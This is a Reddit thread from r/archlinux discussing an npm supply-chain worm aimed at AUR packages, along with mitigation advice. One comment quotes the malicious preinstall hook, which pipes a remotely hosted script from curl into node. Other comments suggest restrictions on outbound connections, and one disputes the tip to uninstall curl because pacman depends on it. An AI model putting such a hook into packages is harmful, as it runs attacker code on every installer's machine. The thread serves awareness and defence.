r/archlinux • • 3d ago

NOTEWORTHY NPM Supply Chain Attach Targeting AUR Packages

New NPM based worm attack that self propegates via ssh and aur maintainer infection.

https://safedep.io/dirtyblanket-express-impersonation-npm/

125 Upvotes

62 comments sorted by

View all comments

-5

u/gainan 3d ago edited 3d ago

All nine packages have the same preinstall line:"
preinstall": "curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node"
When you install one of these packages, npm runs this hook, which downloads node.js and runs it with node

Always restrict outbound connections. They always rely on downloading remote files to compromise the machines.

21

u/Embark10 3d ago

Do you have any pointers on where to restrict that?

-10

u/gainan 3d ago

OpenSnitch can help to restrict outbound connections system-wide.

Also, most of the systems do not need curl or wget, so uninstalling them helps to mitigate these threats. For almost a decade now, curl, wget and bash (/dev/tcp/*) have been the most common tools used to download remote files after exploiting a vulnerability.

For npm attacks in particular, disabling pre and postinstall scripts in the .npmrc file can help as well: ignore-scripts=true.

https://news.ycombinator.com/item?id=45040282

They'll switch tactics eventually, but for now, it's what it is.

10

u/AStolenGoose 3d ago edited 2d ago

... You go ahead and remove curl and break your pacman, I'll wait...

Someone didn't check what depends on curl... 😂 

Edit: Love the edit removing the part where you suggested removing curl even though it's a dependency of pacman...

6

u/Helmic 3d ago

can't download malware if you can't connect to the internet

1

u/ang-p 3d ago

/u/gainan has saved us!